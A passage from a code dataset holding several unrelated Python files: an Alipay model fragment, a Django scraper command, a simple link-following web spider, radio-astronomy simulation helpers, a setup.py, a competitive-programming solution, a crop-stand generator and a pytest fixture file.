d['request_no']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/MybankPaymentTradeBusinessOperateQueryModel.py","file_name":"MybankPaymentTradeBusinessOperateQueryModel.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"624547462","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\n\nfrom order.data_scraper import Scraper\n\nclass Command(BaseCommand):\n\n help = 'Populates or updates database with new products'\n\n def handle(self, *args, **kwargs):\n headers = settings.HEADERS\n url = settings.SCRAPE_URL\n dataframe = Scraper(url, headers)\n dataframe.run()\n","sub_path":"dropship_django/product/management/commands/run_scraper.py","file_name":"run_scraper.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"220751873","text":"#!/usr/bin/env python3\n#\n# File: spider3.py\n# Author: Matt Weidner \n# Descr: Simple web spider that spiders arbitrary site up to\n# X levels deep, customizable by the user.\n# (POC web spider)\n\n\nimport httplib2\nfrom lxml import etree\nimport pprint\nimport re\nimport sys\n\ndebug = False\nlinks = []\nmax_depth = 9999\ndot_count = 0\n\ndef dbg_print(string):\n if debug != False:\n print(' [D]: ' + string)\n\ndef fix_url(base_url, link):\n # Resolves a relative URL to an absolute URL.\n if re.search('^\\w+:', link):\n return link\n elif link[0] == '/':\n return (base_url + link[1:])\n else:\n return (base_url + link)\n\ndef fix_urls(base_url, links):\n new_urls = []\n for url in links:\n if url == '':\n continue\n new_urls.append(fix_url(base_url, url))\n return new_urls\n\ndef get_page_links(http, link):\n new_urls = []\n # HTTP GET a URL and return a list of links parsed from anchor tags.\n r_header,r_body = http.request(link, 'GET')\n #dbg_print('raw type: ' + r_header['content-type'])\n if re.search('text/html',r_header['content-type']):\n if len(r_header['content-type']) < 19:\n str_content_type = 'us-ascii'\n else:\n str_content_type = r_header['content-type'][19:]\n dbg_print('parsed type: ' + str_content_type)\n html = etree.HTML(r_body.decode(str_content_type))\n if (html.xpath('//a/@href')):\n new_urls = html.xpath('//a/@href')\n return new_urls\n\ndef spider(http, base_url, link, mapped_links, unmapped_links, depth):\n global dot_count\n dbg_print('D(' + str(depth) + ') L: ' + link)\n if depth == 0:\n return\n absolute_link = fix_url(base_url, link)\n dbg_print('[spdr] ' + absolute_link)\n page_links = get_page_links(http, absolute_link)\n if not (absolute_link in mapped_links):\n mapped_links.append(absolute_link)\n print(absolute_link)\n if not sys.stdout.isatty():\n print('.',end='',file=sys.stderr)\n dot_count = dot_count + 1\n sys.stderr.flush()\n if dot_count == 40:\n print('',file=sys.stderr)\n dot_count = 0\n if debug:\n pprint.pprint(page_links)\n if not page_links == None:\n unmapped_links = unmapped_links + page_links\n else:\n return\n #pprint.pprint(unmapped_links)\n unmapped_links = fix_urls(base_url, unmapped_links)\n #pprint.pprint(unmapped_links)\n if len(unmapped_links) > 0:\n for link2 in unmapped_links:\n if link2 == '':\n continue\n if not (link2 in mapped_links):\n if re.search('^' + base_url, link2):\n spider(http, base_url, link2, mapped_links, unmapped_links, depth-1)\n\ndef main():\n print(\" _______ _____ _____ ______ _______ ______ _____ __ __\", file=sys.stderr)\n print(\" |______ |_____] | | \\ |______ |_____/ |_____] \\_/ \", file=sys.stderr)\n print(\" ______| | __|__ |_____/ |______ | \\_ . | | \", file=sys.stderr)\n if len(sys.argv) < 2: \n print('[-] No URL specified, using http://www.testfire.net/')\n base_url = 'http://www.testfire.net/'\n else:\n base_url = sys.argv[1]\n http = httplib2.Http('.cache')\n spider(http, base_url, base_url, [], [], max_depth)\n if not sys.stdout.isatty():\n print(' ',file=sys.stderr)\n\nif __name__ == '__main__':\n main()\n","sub_path":"spider3.py","file_name":"spider3.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"627059090","text":"\"\"\" Functions that help with SKA simulations\n\n\"\"\"\n\n__all__ = ['plot_visibility', 'plot_visibility_pol', 'find_times_above_elevation_limit', 'plot_uvcoverage',\n 'plot_azel', 'plot_gaintable', 'plot_pointingtable', 'find_pb_width_null',\n 'create_simulation_components', 'plot_pa']\n\nimport logging\n\nimport astropy.constants as constants\nimport astropy.units as units\nimport matplotlib.pyplot as plt\nimport numpy\nfrom astropy.coordinates import SkyCoord\n\nfrom rascil.data_models.memory_data_models import Skycomponent, BlockVisibility\nfrom rascil.data_models.polarisation import PolarisationFrame\nfrom rascil.processing_components.image import create_image\nfrom rascil.processing_components.image.operations import show_image\nfrom rascil.processing_components.imaging.primary_beams import create_pb\nfrom rascil.processing_components.skycomponent.base import copy_skycomponent\nfrom rascil.processing_components.skycomponent.operations import apply_beam_to_skycomponent, \\\n filter_skycomponents_by_flux\nfrom rascil.processing_components.util.coordinate_support import hadec_to_azel\nfrom rascil.processing_components.visibility.visibility_geometry import calculate_blockvisibility_hourangles, \\\n calculate_blockvisibility_azel, calculate_blockvisibility_parallactic_angles\n\nlog = logging.getLogger('logger')\n\n\ndef find_times_above_elevation_limit(start_times, end_times, location, phasecentre, elevation_limit):\n \"\"\" Find all times for which a phasecentre is above the elevation limit\n \n :param start_times:\n :param end_times:\n :param location:\n :param phasecentre:\n :param elevation_limit:\n :return:\n \"\"\"\n assert len(start_times) == len(end_times)\n \n def valid_elevation(time, location, phasecentre):\n ha = numpy.pi * time / 43200.0\n dec = phasecentre.dec.rad\n az, el = hadec_to_azel(ha, dec, location.lat.rad)\n return el > elevation_limit * numpy.pi / 180.0\n \n number_valid_times = 0\n valid_start_times = []\n for it, t in enumerate(start_times):\n if valid_elevation(start_times[it], location, phasecentre) or \\\n valid_elevation(end_times[it], location, phasecentre):\n valid_start_times.append(t)\n number_valid_times += 1\n \n assert number_valid_times > 0, \"No data above elevation limit\"\n \n log.info(\"find_times_above_elevation_limit: Start times for chunks above elevation limit:\")\n \n return valid_start_times\n\n\ndef plot_visibility(vis_list, title='Visibility', y='amp', x='uvdist', plot_file=None, plot_zero=False, *kwargs):\n \"\"\" Standard plot of visibility\n\n :param vis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n for ivis, vis in enumerate(vis_list):\n if y == 'amp':\n yvalue = numpy.abs(vis.flagged_vis[..., 0, 0]).flat\n else:\n yvalue = numpy.angle(vis.flagged_vis[..., 0, 0]).flat\n xvalue = vis.uvdist.flat\n plt.plot(xvalue[yvalue > 0.0], yvalue[yvalue > 0.0], '.', color='b', markersize=0.2)\n if plot_zero:\n plt.plot(xvalue[yvalue == 0.0], yvalue[yvalue == 0.0], '.', color='r', markersize=0.2)\n\n plt.xlabel(x)\n plt.ylabel(y)\n plt.title(title)\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\ndef plot_visibility_pol(vis_list, title='Visibility_pol', y='amp', x='uvdist', plot_file=None, **kwargs):\n \"\"\" Standard plot of visibility\n\n :param vis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n for ivis, vis in enumerate(vis_list):\n pols = vis.polarisation_frame.names\n colors = [\"red\", \"blue\", \"green\", 
\"purple\"]\n for pol in range(vis.vis.shape[-1]):\n if y == 'amp':\n yvalue = numpy.abs(vis.flagged_vis[..., 0, pol]).flat\n else:\n yvalue = numpy.angle(vis.flagged_vis[..., 0, pol]).flat\n if x==\"time\":\n xvalue = numpy.repeat(vis.time, len(yvalue))\n else:\n xvalue = vis.uvdist.flat\n if ivis == 0:\n plt.plot(xvalue[yvalue > 0.0], yvalue[yvalue > 0.0], '.', color=colors[pol],\n label=pols[pol])\n else:\n plt.plot(xvalue[yvalue > 0.0], yvalue[yvalue > 0.0], '.', color=colors[pol])\n\n plt.xlabel(x)\n plt.ylabel(y)\n plt.title(title)\n plt.legend()\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\n\ndef plot_uvcoverage(vis_list, ax=None, plot_file=None, title='UV coverage', **kwargs):\n \"\"\" Standard plot of uv coverage\n\n :param vis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n \n for ivis, vis in enumerate(vis_list):\n u = numpy.array(vis.u[...].flat)\n v = numpy.array(vis.v[...].flat)\n if isinstance(vis, BlockVisibility):\n k = (vis.frequency / constants.c).value\n u = numpy.array(numpy.outer(u, k).flat)\n v = numpy.array(numpy.outer(v, k).flat)\n plt.plot(u, v, '.', color='b', markersize=0.2)\n plt.plot(-u, -v, '.', color='b', markersize=0.2)\n else:\n k = vis.frequency / constants.c\n u = u * k\n v = v * k\n plt.plot(u.value, v.value, '.', color='b', markersize=0.2)\n plt.plot(-u.value, -v.value, '.', color='b', markersize=0.2)\n plt.xlabel('U (wavelengths)')\n plt.ylabel('V (wavelengths)')\n plt.title(title)\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_azel(bvis_list, plot_file=None, **kwargs):\n \"\"\" Standard plot of az el coverage\n \n :param bvis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n r2d = 180.0 / numpy.pi\n \n for ibvis, bvis in enumerate(bvis_list):\n ha = calculate_blockvisibility_hourangles(bvis).value\n az, el = calculate_blockvisibility_azel(bvis)\n if ibvis == 0:\n plt.plot(ha, az.deg, '.', color='r', label='Azimuth (deg)')\n plt.plot(ha, el.deg, '.', color='b', label='Elevation (deg)')\n else:\n plt.plot(ha, az.deg, '.', color='r')\n plt.plot(ha, el.deg, '.', color='b')\n plt.xlabel('HA (hours)')\n plt.ylabel('Angle')\n plt.legend()\n plt.title('Azimuth and elevation vs hour angle')\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_pa(bvis_list, plot_file=None, **kwargs):\n \"\"\" Standard plot of parallactic angle coverage\n\n :param bvis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n\n for ibvis, bvis in enumerate(bvis_list):\n ha = calculate_blockvisibility_hourangles(bvis).value\n pa = calculate_blockvisibility_parallactic_angles(bvis)\n if ibvis == 0:\n plt.plot(ha, pa.deg, '.', color='r', label='PA (deg)')\n else:\n plt.plot(ha, pa.deg, '.', color='r')\n plt.xlabel('HA (hours)')\n plt.ylabel('Parallactic Angle')\n plt.legend()\n plt.title('Parallactic angle vs hour angle')\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_gaintable(gt_list, title='', value='amp', plot_file='gaintable.png', **kwargs):\n \"\"\" Standard plot of gain table\n \n :param gt_list:\n :param title:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n for igt, gt in enumerate(gt_list):\n nrec = gt[0].nrec\n names = gt[0].receptor_frame.names\n if nrec > 1:\n recs = [0, 1]\n else:\n recs = [1]\n \n colors = ['r', 'b']\n for irec, rec in enumerate(recs):\n amp = numpy.abs(gt[0].gain[:, 0, 0, rec, rec])\n if value == 
'phase':\n y = numpy.angle(gt[0].gain[:, 0, 0, rec, rec])\n if igt == 0:\n plt.plot(gt[0].time[amp > 0.0], y[amp > 0.0], '.', color=colors[rec], label=names[rec])\n else:\n plt.plot(gt[0].time[amp > 0.0], y[amp > 0.0], '.', color=colors[rec])\n else:\n y = amp\n if igt == 0:\n plt.plot(gt[0].time[amp > 0.0], 1.0 / y[amp > 0.0], '.', color=colors[rec], label=names[rec])\n else:\n plt.plot(gt[0].time[amp > 0.0], 1.0 / y[amp > 0.0], '.', color=colors[rec])\n plt.title(title)\n plt.xlabel('Time (s)')\n plt.legend()\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_pointingtable(pt_list, plot_file, title, **kwargs):\n \"\"\" Standard plot of pointing table\n \n :param pt_list:\n :param plot_file:\n :param title:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n r2a = 180.0 * 3600.0 / numpy.pi\n rms_az = 0.0\n rms_el = 0.0\n num = 0\n for pt in pt_list:\n num += len(pt.pointing[:, 0, 0, 0, 0])\n rms_az += numpy.sum((r2a * pt.pointing[:, 0, 0, 0, 0]) ** 2)\n rms_el += numpy.sum((r2a * pt.pointing[:, 0, 0, 0, 1]) ** 2)\n plt.plot(pt.time, r2a * pt.pointing[:, 0, 0, 0, 0], '.', color='r')\n plt.plot(pt.time, r2a * pt.pointing[:, 0, 0, 0, 1], '.', color='b')\n \n rms_az = numpy.sqrt(rms_az / num)\n rms_el = numpy.sqrt(rms_el / num)\n plt.title(\"%s az, el rms %.2f %.2f (arcsec)\" % (title, rms_az, rms_el))\n plt.xlabel('Time (s)')\n plt.ylabel('Offset (arcsec)')\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef find_pb_width_null(pbtype, frequency, **kwargs):\n \"\"\" Rough estimates of HWHM and null locations\n \n :param pbtype:\n :param frequency:\n :param kwargs:\n :return:\n \"\"\"\n if pbtype == 'MID':\n HWHM_deg = 0.596 * 1.36e9 / frequency[0]\n null_az_deg = 2.0 * HWHM_deg\n null_el_deg = 2.0 * HWHM_deg\n elif pbtype == 'MID_FEKO_B1':\n null_az_deg = 1.0779 * 1.36e9 / frequency[0]\n null_el_deg = 1.149 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n elif pbtype == 'MID_FEKO_B2':\n null_az_deg = 1.0779 * 1.36e9 / frequency[0]\n null_el_deg = 1.149 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n elif pbtype == 'MID_FEKO_Ku':\n null_az_deg = 1.0779 * 1.36e9 / frequency[0]\n null_el_deg = 1.149 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n else:\n null_az_deg = 1.145 * 1.36e9 / frequency[0]\n null_el_deg = 1.145 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n \n return HWHM_deg, null_az_deg, null_el_deg\n\n\ndef create_simulation_components(context, phasecentre, frequency, pbtype, offset_dir, flux_limit,\n pbradius, pb_npixel, pb_cellsize, show=False, fov=10,\n polarisation_frame=PolarisationFrame(\"stokesI\"),\n filter_by_primary_beam=True, flux_max=10.0):\n \"\"\" Construct components for simulation\n \n :param context: singlesource or null or s3sky\n :param phasecentre: Centre of components\n :param frequency: Frequency\n :param pbtype: Type of primary beam\n :param offset_dir: Offset in ra, dec degrees\n :param flux_limit: Lower limit flux\n :param pbradius: Radius of components in radians\n :param pb_npixel: Number of pixels in the primary beam model\n :param pb_cellsize: Cellsize in primary beam model\n :param fov: FOV in degrees (used to select catalog)\n :param flux_max: Maximum flux in model before application of primary beam\n :param filter_by_primary_beam: Filter components by primary beam\n :param polarisation_frame:\n :param show:\n\n :return:\n \"\"\"\n \n HWHM_deg, null_az_deg, null_el_deg = find_pb_width_null(pbtype, 
frequency)\n \n dec = phasecentre.dec.deg\n ra = phasecentre.ra.deg\n \n if context == 'singlesource':\n log.info(\"create_simulation_components: Constructing single component\")\n offset = [HWHM_deg * offset_dir[0], HWHM_deg * offset_dir[1]]\n log.info(\n \"create_simulation_components: Offset from pointing centre = %.3f, %.3f deg\" % (\n offset[0], offset[1]))\n \n # The point source is offset to approximately the halfpower point\n odirection = SkyCoord(\n ra=(ra + offset[0] / numpy.cos(numpy.pi * dec / 180.0)) * units.deg,\n dec=(dec + offset[1]) * units.deg,\n frame='icrs', equinox='J2000')\n \n if polarisation_frame.type == \"stokesIQUV\":\n original_components = [\n Skycomponent(flux=[[1.0, 0.0, 0.0, 0.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesIQUV'))]\n else:\n original_components = [\n Skycomponent(flux=[[1.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesI'))]\n \n offset_direction = odirection\n \n elif context == 'doublesource':\n \n original_components = []\n \n log.info(\"create_simulation_components: Constructing double components\")\n \n for sign_offset in [(-1, 0), (1, 0)]:\n offset = [HWHM_deg * sign_offset[0], HWHM_deg * sign_offset[1]]\n \n log.info(\n \"create_simulation_components: Offset from pointing centre = %.3f, %.3f deg\" % (\n offset[0], offset[1]))\n \n odirection = SkyCoord(\n ra=(ra + offset[0] / numpy.cos(numpy.pi * dec / 180.0)) * units.deg,\n dec=(dec + offset[1]) * units.deg,\n frame='icrs', equinox='J2000')\n if polarisation_frame.type == \"stokesIQUV\":\n original_components.append(\n Skycomponent(flux=[[1.0, 0.0, 0.0, 0.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesIQUV')))\n else:\n original_components.append(\n Skycomponent(flux=[[1.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesI')))\n \n for o in original_components:\n print(o)\n \n offset_direction = odirection\n \n elif context == 'null':\n log.info(\"create_simulation_components: Constructing single component at the null\")\n \n offset = [null_az_deg * offset_dir[0], null_el_deg * offset_dir[1]]\n HWHM = HWHM_deg * numpy.pi / 180.0\n \n log.info(\"create_simulation_components: Offset from pointing centre = %.3f, %.3f deg\" % (offset[0], offset[1]))\n \n # The point source is offset to approximately the null point\n offset_direction = SkyCoord(ra=(ra + offset[0] / numpy.cos(numpy.pi * dec / 180.0)) * units.deg,\n dec=(dec + offset[1]) * units.deg,\n frame='icrs', equinox='J2000')\n \n if polarisation_frame.type == \"stokesIQUV\":\n original_components = [\n Skycomponent(flux=[[1.0, 0.0, 0.0, 0.0]], direction=offset_direction, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesIQUV'))]\n else:\n original_components = [\n Skycomponent(flux=[[1.0]], direction=offset_direction, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesI'))]\n \n else:\n offset = [0.0, 0.0]\n # Make a skymodel from S3\n max_flux = 0.0\n total_flux = 0.0\n log.info(\"create_simulation_components: Constructing s3sky components\")\n from rascil.processing_components.simulation import create_test_skycomponents_from_s3\n \n all_components = create_test_skycomponents_from_s3(flux_limit=flux_limit / 100.0,\n phasecentre=phasecentre,\n polarisation_frame=polarisation_frame,\n frequency=numpy.array(frequency),\n radius=pbradius,\n fov=fov)\n original_components = filter_skycomponents_by_flux(all_components, 
flux_max=flux_max)\n log.info(\"create_simulation_components: %d components before application of primary beam\" %\n (len(original_components)))\n \n\n \n if filter_by_primary_beam:\n pbmodel = create_image(npixel=pb_npixel,\n cellsize=pb_cellsize,\n phasecentre=phasecentre,\n frequency=frequency,\n polarisation_frame=PolarisationFrame(\"stokesI\"))\n stokesi_components = [copy_skycomponent(o) for o in original_components]\n for s in stokesi_components:\n s.flux = numpy.array([[s.flux[0, 0]]])\n s.polarisation_frame = PolarisationFrame(\"stokesI\")\n \n pb = create_pb(pbmodel, \"MID_GAUSS\", pointingcentre=phasecentre, use_local=False)\n pb_applied_components = [copy_skycomponent(c) for c in stokesi_components]\n pb_applied_components = apply_beam_to_skycomponent(pb_applied_components, pb)\n filtered_components = []\n for icomp, comp in enumerate(pb_applied_components):\n if comp.flux[0, 0] > flux_limit:\n total_flux += comp.flux[0, 0]\n if abs(comp.flux[0, 0]) > max_flux:\n max_flux = abs(comp.flux[0, 0])\n filtered_components.append(original_components[icomp])\n log.info(\"create_simulation_components: %d components > %.3f Jy after filtering with primary beam\" %\n (len(filtered_components), flux_limit))\n log.info(\"create_simulation_components: Strongest components is %g (Jy)\" % max_flux)\n log.info(\"create_simulation_components: Total flux in components is %g (Jy)\" % total_flux)\n original_components = [copy_skycomponent(c) for c in filtered_components]\n if show:\n plt.clf()\n show_image(pb, components=original_components)\n plt.show(block=False)\n \n log.info(\"create_simulation_components: Created %d components\" % len(original_components))\n # Primary beam points to the phasecentre\n offset_direction = SkyCoord(ra=ra * units.deg, dec=dec * units.deg, frame='icrs',\n equinox='J2000')\n \n return original_components, offset_direction\n","sub_path":"rascil/processing_components/simulation/simulation_helpers.py","file_name":"simulation_helpers.py","file_ext":"py","file_size_in_byte":18987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
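A quick check of the beam-width helper defined above, using only the pure arithmetic in `find_pb_width_null`: at the reference frequency of 1.36 GHz the 'MID' model gives an HWHM of 0.596 deg with nulls at twice that.

```python
frequency = [1.36e9]   # only frequency[0] is used by the helper
hwhm, null_az, null_el = find_pb_width_null('MID', frequency)
print(hwhm, null_az, null_el)   # 0.596 1.192 1.192
```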
+{"seq_id":"328187947","text":"# coding=utf-8\nfrom setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='request_log_info',\n version='1.0.0',\n description='',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author='zhangruyu',\n author_email='1582034460@qq.com',\n license=\"BSD\",\n url='https://github.com/zhangruyu/request_log_info',\n packages=find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n ],\n)\n\n# python setup.py sdist buil\n# python setup.py sdist buil\n","sub_path":"pypi_install_script/request_log_info-1.0.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"29646810","text":"'''\n#!/usr/bin/python\n\ndef ia(): return map(int, raw_input().split())\n\nn, k = ia()\np = ia()\nc = ia()\n\nh = []\nP = zip(p, c, xrange(n))\nP.sort()\n\nlst = [None] * n\nh = []\nfor p, c, i in P:\n ans = c + sum(h)\n lst[i] = ans\n h.append(c)\n h.sort(reverse=True)\n h = h[:k]\n\nprint \" \".join(map(str, lst))\n\n4 2\n4 5 9 7\n1 2 11 33\n'''\nnk, k = [int(x) for x in input().split()]\nknights = [int(x) for x in input().split()]\ncoins = [int(x) for x in input().split()]\n\ndata = sorted(zip(knights, coins, range(nk)))\nhave = [0] * nk\nselected = []\nfor p, c, i in data:\n ans = c + sum(selected)\n have[i] = ans\n selected.append(c)\n selected = sorted(selected, reverse=True)[:k]\nprint(*have)\n\n\n\n\n\n\n","sub_path":"CodeForces/488_B_knightsOfPolygonTable.py","file_name":"488_B_knightsOfPolygonTable.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"309512585","text":"\"\"\"\r\nClass interface for stand generation\r\n\"\"\"\r\n\r\nfrom math import sqrt\r\nfrom random import sample\r\nfrom scipy.interpolate import interp1d\r\n\r\nfrom alinea.adel.stand.stand import agronomicplot, regular_plot\r\n\r\nclass AgronomicStand(object):\r\n \r\n def __init__(self, sowing_density=10, plant_density=10, inter_row=0.8, noise=0, density_curve_data=None):\r\n self.sowing_density = sowing_density\r\n self.inter_row = inter_row\r\n self.plant_density = plant_density\r\n self.inter_plant = 1. / inter_row / sowing_density\r\n self.noise = noise\r\n df = density_curve_data\r\n if df is None:\r\n self.density_curve=None\r\n else:\r\n #hs_curve = interp1d(df['HS'], df['density'])\r\n TT_curve = interp1d(df['TT'], df['density'])\r\n #self.density_curve = {'hs_curve':hs_curve,'TT_curve':TT_curve}\r\n self.density_curve = TT_curve\r\n \r\n \r\n \r\n def plot_dimensions(self, nplants =1, aspect = 'square'):\r\n \r\n if aspect =='square':\r\n side = sqrt(1. / self.sowing_density * nplants)\r\n nrow = max(1, round(side / self.inter_row))\r\n plant_per_row = max(1, round(side / self.inter_plant)) \r\n plot_length = self.inter_plant * plant_per_row\r\n plot_width = self.inter_row * nrow\r\n return plot_length, plot_width\r\n elif aspect == 'line':\r\n plot_width = self.inter_row \r\n plot_length = nplants * self.inter_plant * self.sowing_density / float(self.plant_density) if self.plant_density > 0. else 0.\r\n return plot_length, plot_width \r\n else:\r\n return 0.5, 0.5\r\n \r\n def smart_stand(self, nplants=1, at=None):\r\n \"\"\" return an (almost) square stand that match inter-row, current density and nplants in the stand, \r\n but (dynamicaly) adjusting inter-plant to solve the problem\r\n \"\"\"\r\n \r\n density = self.plant_density\r\n if at is not None:\r\n if self.density_curve is not None:\r\n density = self.density_curve(at)\r\n \r\n # find a square design for sowing\r\n nsown = nplants * 1. * self.sowing_density / density\r\n side = sqrt(1. / self.sowing_density * nsown)\r\n nrow = int(max(1, round(side / self.inter_row)))\r\n plant_per_row = int(max(1, round(float(nsown) / nrow)))\r\n while nplants > (nrow * plant_per_row):\r\n plant_per_row += 1\r\n domain_area = nrow * self.inter_row * plant_per_row * self.inter_plant\r\n # adjust inter_plant spacing so that n_emerged / domain_area match plant density \r\n n_emerged = int(round(domain_area * density))\r\n #assert(n_emerged >= nplants)\r\n n_emerged = nplants\r\n target_domain_area = 1. 
* n_emerged / density\r\n inter_plant = target_domain_area / (plant_per_row * nrow * self.inter_row) \r\n \r\n positions, domain, domain_area = regular_plot(inter_plant, self.inter_row, nrow, plant_per_row, noise=self.noise)\r\n\r\n positions = sample(positions, nplants)\r\n return nplants, domain, positions, domain_area\r\n \r\n \r\n def stand(self, nplants = 1, aspect='square'):\r\n \r\n length, width = self.plot_dimensions(nplants, aspect)\r\n n_emerged, positions, domain, domain_area, convUnit = agronomicplot(length, width, self.sowing_density, self.plant_density, self.inter_row, noise=self.noise)\r\n \r\n return n_emerged, domain, positions, length * width\r\n \r\n def plot(self, positions):\r\n import pandas\r\n \r\n df = pandas.DataFrame(positions)\r\n df.plot(0,1,style='o')\r\n \r\n \r\ndef agronomicStand_node(sowing_density=10, plant_density=10, inter_row=0.8, noise=0, density_curve_data=None):\r\n return AgronomicStand(**locals())","sub_path":"adel/Stand.py","file_name":"Stand.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
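A minimal usage sketch, assuming the `alinea.adel` package is installed; the densities and spacing are hypothetical, wheat-like numbers (250 plants/m2 sown, 0.15 m between rows):

```python
stand = AgronomicStand(sowing_density=250, plant_density=200, inter_row=0.15)
length, width = stand.plot_dimensions(nplants=50)   # smallest near-square plot
```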
+{"seq_id":"48756783","text":"import os\nimport subprocess\nimport datetime\n\nfrom bs4 import BeautifulSoup\n\nimport pytest\nfrom alembic.command import upgrade\nfrom alembic.config import Config\nfrom flask_migrate import Migrate, MigrateCommand\nfrom flask_script import Manager\nimport sqlalchemy\nfrom flask_jwt_extended import create_access_token, create_refresh_token\n\nfrom app import create_app, db as _db, get_env\nfrom app.models import EVENT\nfrom tests.db import (\n create_article,\n create_email,\n create_event,\n create_event_date,\n create_event_type,\n create_fee,\n create_marketing,\n create_member,\n create_reject_reason,\n create_speaker,\n create_user,\n create_venue\n)\n\nTEST_DATABASE_URI = \"postgresql://localhost/na_api_\" + get_env() + '_test'\nTEST_ADMIN_USER = 'admin@example.com'\nTEST_ADMIN_USER_CONFIG = 'admin-config@example.com'\n\n\n@pytest.yield_fixture(scope='session')\ndef app():\n _app = create_app(**{\n 'TESTING': True,\n 'ENVIRONMENT': 'test',\n 'SQLALCHEMY_DATABASE_URI': TEST_DATABASE_URI,\n 'PREFERRED_URL_SCHEME': 'http',\n 'ADMIN_CLIENT_ID': 'testadmin',\n 'ADMIN_CLIENT_SECRET': 'testsecret',\n 'TOKEN_EXPIRY': 1,\n 'JWT_SECRET_KEY': 'secret',\n 'ADMIN_USERS': [TEST_ADMIN_USER_CONFIG],\n 'EMAIL_DOMAIN': 'example.com',\n 'EMAIL_TOKENS': {\"member_id\": \"memberid\", \"type\": \"typeid\"},\n 'EMAIL_SALT': 'test',\n 'EMAIL_UNSUB_SALT': 'unsub_test',\n 'TEST_EMAIL': 'test@example.com',\n 'EVENTS_MAX': 2,\n 'PROJECT': 'test-project',\n 'STORAGE': 'test-store',\n 'PAYPAL_URL': 'https://test.paypal',\n 'PAYPAL_USER': 'seller@test.com',\n 'PAYPAL_PASSWORD': 'test pass',\n 'PAYPAL_SIG': 'paypal signature',\n 'PAYPAL_RECEIVER': 'receiver@example.com',\n 'PAYPAL_VERIFY_URL': 'https://test.paypal/verify',\n 'API_BASE_URL': 'http://test',\n 'FRONTEND_URL': 'http://frontend-test',\n 'FRONTEND_ADMIN_URL': 'http://frontend-test/admin',\n 'CELERY_BROKER_URL': 'http://mock-celery',\n 'EMAIL_DELAY': 60\n })\n\n ctx = _app.app_context()\n ctx.push()\n\n yield _app\n\n ctx.pop()\n\n\n@pytest.fixture(scope='session')\ndef db(app):\n assert _db.engine.url.database.endswith('_test'), 'dont run tests against main db'\n\n create_test_db_if_does_not_exist(_db)\n\n Migrate(app, _db)\n Manager(_db, MigrateCommand)\n BASE_DIR = os.path.dirname(os.path.dirname(__file__))\n ALEMBIC_CONFIG = os.path.join(BASE_DIR, 'migrations')\n config = Config(ALEMBIC_CONFIG + '/alembic.ini')\n config.set_main_option(\"script_location\", ALEMBIC_CONFIG)\n\n with app.app_context():\n upgrade(config, 'head')\n\n yield _db\n\n _db.session.remove()\n _db.get_engine(app).dispose()\n\n\n@pytest.fixture(scope='function')\ndef db_session(db):\n yield db\n\n db.session.remove()\n for tbl in reversed(db.metadata.sorted_tables):\n if tbl.name not in [\"event_states\", \"email_types\", \"email_states\", \"ticket_types\", \"ticket_statuses\"]:\n db.engine.execute(tbl.delete())\n db.session.commit()\n\n\n@pytest.fixture(scope='function')\ndef sample_article(db):\n return create_article(title='Ancient Greece')\n\n\n@pytest.fixture(scope='function')\ndef sample_email(db):\n return create_email(\n details='Fees: 10, Concessions: 5',\n created_at='2019-06-01',\n expires='2019-07-01'\n )\n\n\n@pytest.fixture(scope='function')\ndef sample_marketing(db):\n return create_marketing(\n old_id=1,\n description='Leaflet'\n )\n\n\n@pytest.fixture(scope='function')\ndef sample_member(db):\n return create_member(\n name='Sue Green',\n email='sue@example.com'\n 